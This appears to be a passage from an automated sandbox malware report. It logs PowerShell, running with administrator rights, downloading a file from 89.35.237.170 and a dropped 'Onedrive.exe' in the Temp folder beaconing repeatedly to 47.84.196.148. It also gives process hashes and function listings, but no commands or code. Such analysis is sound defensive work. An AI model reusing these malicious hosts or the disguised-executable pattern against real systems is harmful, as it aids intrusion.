Dec 19, 2024 13:36:19.267625093 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.267664909 CET | 49707 | 443 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:19.267688036 CET | 49707 | 443 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:19.278445005 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.278491020 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.278548956 CET | 49707 | 443 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:19.278557062 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.278613091 CET | 49707 | 443 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:19.301598072 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.301645994 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.301697969 CET | 49707 | 443 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:19.301711082 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.301764011 CET | 49707 | 443 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:19.313966036 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.314018011 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.314099073 CET | 49707 | 443 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:19.314099073 CET | 49707 | 443 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:19.314127922 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.314163923 CET | 443 | 49707 | 89.35.237.170 | 192.168.2.5 |
Dec 19, 2024 13:36:19.314224958 CET | 49707 | 443 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:19.319433928 CET | 49707 | 443 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:19.809180975 CET | 49706 | 80 | 192.168.2.5 | 89.35.237.170 |
Dec 19, 2024 13:36:20.100474119 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:20.100579977 CET | 443 | 49709 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:20.100662947 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:20.101818085 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:20.101855993 CET | 443 | 49709 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:21.797278881 CET | 443 | 49709 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:21.797399998 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:21.798705101 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:21.798718929 CET | 443 | 49709 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:21.799077988 CET | 443 | 49709 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:21.846442938 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:21.850359917 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:21.850378990 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:21.850619078 CET | 443 | 49709 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:22.689477921 CET | 443 | 49709 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:22.689693928 CET | 443 | 49709 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:22.689778090 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:22.689968109 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:22.690007925 CET | 443 | 49709 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:22.690035105 CET | 49709 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:22.690049887 CET | 443 | 49709 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:51.881057024 CET | 49785 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:51.881160975 CET | 443 | 49785 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:51.881278992 CET | 49785 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:51.881690979 CET | 49785 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:51.881727934 CET | 443 | 49785 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:53.790841103 CET | 443 | 49785 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:53.791652918 CET | 49785 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:53.791702032 CET | 443 | 49785 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:53.803867102 CET | 49785 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:53.803890944 CET | 443 | 49785 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:53.803951979 CET | 49785 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:53.803961992 CET | 443 | 49785 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:54.709228039 CET | 443 | 49785 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:54.709290028 CET | 443 | 49785 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:54.709357023 CET | 49785 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:54.709866047 CET | 49785 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:54.709889889 CET | 443 | 49785 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:36:54.709903955 CET | 49785 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:36:54.709911108 CET | 443 | 49785 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:37:31.521915913 CET | 49879 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:37:31.521996975 CET | 443 | 49879 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:37:31.526298046 CET | 49879 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:37:31.530494928 CET | 49879 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:37:31.530538082 CET | 443 | 49879 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:37:33.212268114 CET | 443 | 49879 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:37:33.216269016 CET | 49879 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:37:33.216289997 CET | 443 | 49879 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:37:33.245439053 CET | 49879 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:37:33.245440006 CET | 49879 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:37:33.245466948 CET | 443 | 49879 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:37:33.245517969 CET | 443 | 49879 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:37:34.117444038 CET | 443 | 49879 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:37:34.117523909 CET | 443 | 49879 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:37:34.117580891 CET | 49879 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:37:34.117707968 CET | 49879 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:37:34.117748022 CET | 443 | 49879 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:37:34.117779016 CET | 49879 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:37:34.117793083 CET | 443 | 49879 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:09.850261927 CET | 49965 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:09.850317955 CET | 443 | 49965 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:09.850380898 CET | 49965 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:09.850961924 CET | 49965 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:09.850981951 CET | 443 | 49965 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:11.523046970 CET | 443 | 49965 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:11.523153067 CET | 49965 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:11.527365923 CET | 49965 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:11.527385950 CET | 443 | 49965 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:11.527610064 CET | 443 | 49965 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:11.560529947 CET | 49965 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:11.560600996 CET | 49965 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:11.560743093 CET | 443 | 49965 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:12.406048059 CET | 443 | 49965 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:12.406156063 CET | 443 | 49965 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:12.406199932 CET | 49965 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:12.406342983 CET | 49965 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:12.406348944 CET | 443 | 49965 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:42.146163940 CET | 49983 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:42.146209955 CET | 443 | 49983 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:42.146286964 CET | 49983 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:42.146704912 CET | 49983 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:42.146719933 CET | 443 | 49983 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:43.846441984 CET | 443 | 49983 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:43.846530914 CET | 49983 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:43.848345995 CET | 49983 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:43.848351955 CET | 443 | 49983 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:43.849116087 CET | 443 | 49983 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:43.882306099 CET | 49983 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:43.882306099 CET | 49983 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:43.882482052 CET | 443 | 49983 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:44.737021923 CET | 443 | 49983 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:44.737337112 CET | 443 | 49983 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:44.738924980 CET | 49983 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:44.742896080 CET | 49983 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:44.742914915 CET | 443 | 49983 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:38:44.742937088 CET | 49983 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:38:44.742944002 CET | 443 | 49983 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:21.208311081 CET | 49984 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:21.208368063 CET | 443 | 49984 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:21.210102081 CET | 49984 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:21.210745096 CET | 49984 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:21.210760117 CET | 443 | 49984 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:22.885863066 CET | 443 | 49984 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:22.886054993 CET | 49984 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:22.887913942 CET | 49984 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:22.887933969 CET | 443 | 49984 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:22.888277054 CET | 443 | 49984 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:22.922673941 CET | 49984 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:22.922673941 CET | 49984 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:22.922837019 CET | 443 | 49984 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:23.703131914 CET | 443 | 49984 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:23.703219891 CET | 443 | 49984 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:23.703463078 CET | 49984 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:23.703712940 CET | 49984 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:23.703712940 CET | 49984 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:23.703736067 CET | 443 | 49984 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:23.703748941 CET | 443 | 49984 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:51.272222042 CET | 49985 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:51.272289038 CET | 443 | 49985 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:51.272466898 CET | 49985 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:51.272972107 CET | 49985 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:51.272984982 CET | 443 | 49985 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:52.948055029 CET | 443 | 49985 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:52.948306084 CET | 49985 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:52.951968908 CET | 49985 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:52.952006102 CET | 443 | 49985 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:52.952387094 CET | 443 | 49985 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:52.978893042 CET | 49985 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:52.978893042 CET | 49985 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:52.979043961 CET | 443 | 49985 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:53.830974102 CET | 443 | 49985 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:53.831072092 CET | 443 | 49985 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:53.832046032 CET | 49985 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:53.832221031 CET | 49985 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:53.832221031 CET | 49985 | 443 | 192.168.2.5 | 47.84.196.148 |
Dec 19, 2024 13:39:53.832237005 CET | 443 | 49985 | 47.84.196.148 | 192.168.2.5 |
Dec 19, 2024 13:39:53.832246065 CET | 443 | 49985 | 47.84.196.148 | 192.168.2.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 19, 2024 13:36:09.630408049 CET | 52506 | 53 | 192.168.2.5 | 1.1.1.1 |
Dec 19, 2024 13:36:09.855362892 CET | 53 | 52506 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 19, 2024 13:36:09.630408049 CET | 192.168.2.5 | 1.1.1.1 | 0x437a | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 19, 2024 13:36:09.855362892 CET | 1.1.1.1 | 192.168.2.5 | 0x437a | No error (0) | 89.35.237.170 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49704 | 89.35.237.170 | 80 | 5324 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 13:36:09.991586924 CET | 173 | OUT | |
Dec 19, 2024 13:36:11.410036087 CET | 545 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49706 | 89.35.237.170 | 80 | 5324 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 13:36:14.847450018 CET | 145 | OUT | |
Dec 19, 2024 13:36:16.276683092 CET | 541 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49705 | 89.35.237.170 | 443 | 5324 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 12:36:13 UTC | 173 | OUT | |
2024-12-19 12:36:13 UTC | 673 | IN | |
2024-12-19 12:36:13 UTC | 16384 | IN | |
2024-12-19 12:36:13 UTC | 16384 | IN | |
2024-12-19 12:36:14 UTC | 16384 | IN | |
2024-12-19 12:36:14 UTC | 16384 | IN | |
2024-12-19 12:36:14 UTC | 16384 | IN | |
2024-12-19 12:36:14 UTC | 16384 | IN | |
2024-12-19 12:36:14 UTC | 5631 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49707 | 89.35.237.170 | 443 | 5324 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 12:36:17 UTC | 145 | OUT | |
2024-12-19 12:36:18 UTC | 673 | IN | |
2024-12-19 12:36:18 UTC | 16384 | IN | |
2024-12-19 12:36:18 UTC | 16384 | IN | |
2024-12-19 12:36:18 UTC | 16384 | IN | |
2024-12-19 12:36:18 UTC | 16384 | IN | |
2024-12-19 12:36:18 UTC | 16384 | IN | |
2024-12-19 12:36:18 UTC | 16384 | IN | |
2024-12-19 12:36:18 UTC | 16384 | IN | |
2024-12-19 12:36:18 UTC | 16384 | IN | |
2024-12-19 12:36:19 UTC | 16384 | IN | |
2024-12-19 12:36:19 UTC | 16384 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.5 | 49709 | 47.84.196.148 | 443 | 5036 | C:\Users\user\AppData\Local\Temp\Onedrive.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 12:36:21 UTC | 179 | OUT | |
2024-12-19 12:36:21 UTC | 282 | OUT | |
2024-12-19 12:36:22 UTC | 166 | IN | |
2024-12-19 12:36:22 UTC | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.5 | 49785 | 47.84.196.148 | 443 | 5036 | C:\Users\user\AppData\Local\Temp\Onedrive.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 12:36:53 UTC | 178 | OUT | |
2024-12-19 12:36:53 UTC | 20 | OUT | |
2024-12-19 12:36:54 UTC | 167 | IN | |
2024-12-19 12:36:54 UTC | 12 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.5 | 49879 | 47.84.196.148 | 443 | 5036 | C:\Users\user\AppData\Local\Temp\Onedrive.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 12:37:33 UTC | 178 | OUT | |
2024-12-19 12:37:33 UTC | 20 | OUT | |
2024-12-19 12:37:34 UTC | 167 | IN | |
2024-12-19 12:37:34 UTC | 12 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.5 | 49965 | 47.84.196.148 | 443 | 5036 | C:\Users\user\AppData\Local\Temp\Onedrive.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 12:38:11 UTC | 178 | OUT | |
2024-12-19 12:38:11 UTC | 20 | OUT | |
2024-12-19 12:38:12 UTC | 167 | IN | |
2024-12-19 12:38:12 UTC | 12 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.5 | 49983 | 47.84.196.148 | 443 | 5036 | C:\Users\user\AppData\Local\Temp\Onedrive.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 12:38:43 UTC | 178 | OUT | |
2024-12-19 12:38:43 UTC | 20 | OUT | |
2024-12-19 12:38:44 UTC | 167 | IN | |
2024-12-19 12:38:44 UTC | 12 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.5 | 49984 | 47.84.196.148 | 443 | 5036 | C:\Users\user\AppData\Local\Temp\Onedrive.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 12:39:22 UTC | 178 | OUT | |
2024-12-19 12:39:22 UTC | 20 | OUT | |
2024-12-19 12:39:23 UTC | 167 | IN | |
2024-12-19 12:39:23 UTC | 12 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.5 | 49985 | 47.84.196.148 | 443 | 5036 | C:\Users\user\AppData\Local\Temp\Onedrive.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 12:39:52 UTC | 178 | OUT | |
2024-12-19 12:39:52 UTC | 20 | OUT | |
2024-12-19 12:39:53 UTC | 167 | IN | |
2024-12-19 12:39:53 UTC | 12 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 07:36:06 |
Start date: | 19/12/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7be880000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 07:36:06 |
Start date: | 19/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 07:36:18 |
Start date: | 19/12/2024 |
Path: | C:\Users\user\AppData\Local\Temp\Onedrive.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6104f0000 |
File size: | 110'536 bytes |
MD5 hash: | 32C31F06E0B68F349F68AFDD08E45F3D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | low |
Has exited: | false |
Function 00007FF848E937B5 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 1.3% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 47.3% |
Total number of Nodes: | 188 |
Total number of Limit Nodes: | 8 |
Graph
Function 00007FF8A0301010 Relevance: 63.2, APIs: 21, Strings: 15, Instructions: 226libraryfileloaderCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6104F1384 Relevance: 31.8, APIs: 21, Instructions: 308windowCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF8A031B5A0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 228memoryCOMMONLIBRARYCODE
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0000021BD8F80020 Relevance: 3.3, APIs: 2, Instructions: 262nativememoryCOMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF8A0330510 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF8A03015E0 Relevance: 6.1, APIs: 4, Instructions: 110threadinjectionCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF8A03302D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF8A031B500 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF8A0302039 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6104F892C Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 218threadCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6104F1F10 Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 134COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF8A031BDC0 Relevance: 26.7, APIs: 2, Strings: 13, Instructions: 461COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6104FA33C Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 226memoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6104F5E74 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 152filememorylibraryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF8A0327470 Relevance: 18.2, APIs: 12, Instructions: 212fileCOMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6104F8E4C Relevance: 17.6, APIs: 14, Instructions: 101memoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6104F7B1C Relevance: 15.3, APIs: 10, Instructions: 284memorycomCOMMON
APIs |
|
